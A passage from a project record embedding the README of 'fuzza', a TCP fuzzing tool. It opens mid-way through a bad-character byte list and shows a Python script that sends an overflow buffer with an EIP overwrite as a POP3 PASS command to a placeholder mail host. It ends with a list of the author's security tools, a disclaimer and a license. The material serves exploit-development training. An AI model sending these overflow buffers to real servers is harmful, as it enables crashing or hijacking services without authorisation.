\"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n    \"\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\"\n    \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\"\n    \"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\"\n    \"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\"\n    \"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\"\n    
\"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\"\n    \"\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\"\n    \"\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\"\n    \"\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\"\n    \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\"\n    \"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\"\n    \"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\"\n    \"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\"\n    \"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n)\n\nbuffer = \"A\"*len_overflow + eip + badchars\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n    s.connect(('mail.example.tld', 110))\n    s.recv(1024)\n    s.send(str2b('USER test\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('PASS ' + buffer + '\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('QUIT\\r\\n'))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\n\n## :lock: [cytopia](https://github.com/cytopia) sec tools\n\nBelow is a list of sec tools and docs I am maintaining.\n\n| Name                 | Category             | Language   | Description |\n|----------------------|----------------------|------------|-------------|\n| **[offsec]**         | Documentation        | Markdown   | Offsec checklist, tools and examples |\n| **[header-fuzz]**    | Enumeration          | Bash       | Fuzz HTTP headers |\n| **[smtp-user-enum]** | Enumeration          | Python 2+3 | SMTP users enumerator |\n| **[urlbuster]**      | Enumeration          | Python 2+3 | Mutable web directory fuzzer |\n| **[netcat]**         | Pivoting             | Python 2+3 | Cross-platform netcat |\n| **[badchars]**       | Reverse Engineering  | Python 2+3 
| Badchar generator |\n| **[fuzza]**          | Reverse Engineering  | Python 2+3 | TCP fuzzing tool |\n\n[offsec]: https://github.com/cytopia/offsec\n[header-fuzz]: https://github.com/cytopia/header-fuzz\n[smtp-user-enum]: https://github.com/cytopia/smtp-user-enum\n[urlbuster]: https://github.com/cytopia/urlbuster\n[netcat]: https://github.com/cytopia/netcat\n[badchars]: https://github.com/cytopia/badchars\n[fuzza]: https://github.com/cytopia/fuzza\n\n\n## :octocat: Contributing\n\nSee **[Contributing guidelines](CONTRIBUTING.md)** to help to improve this project.\n\n\n## :exclamation: Disclaimer\n\nThis tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.\n\n\n## :page_facing_up: License\n\n**[MIT License](LICENSE.txt)**\n\nCopyright (c) 2020 **[cytopia](https://github.com/cytopia)**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcytopia%2Ffuzza","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcytopia%2Ffuzza","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcytopia%2Ffuzza/lists"}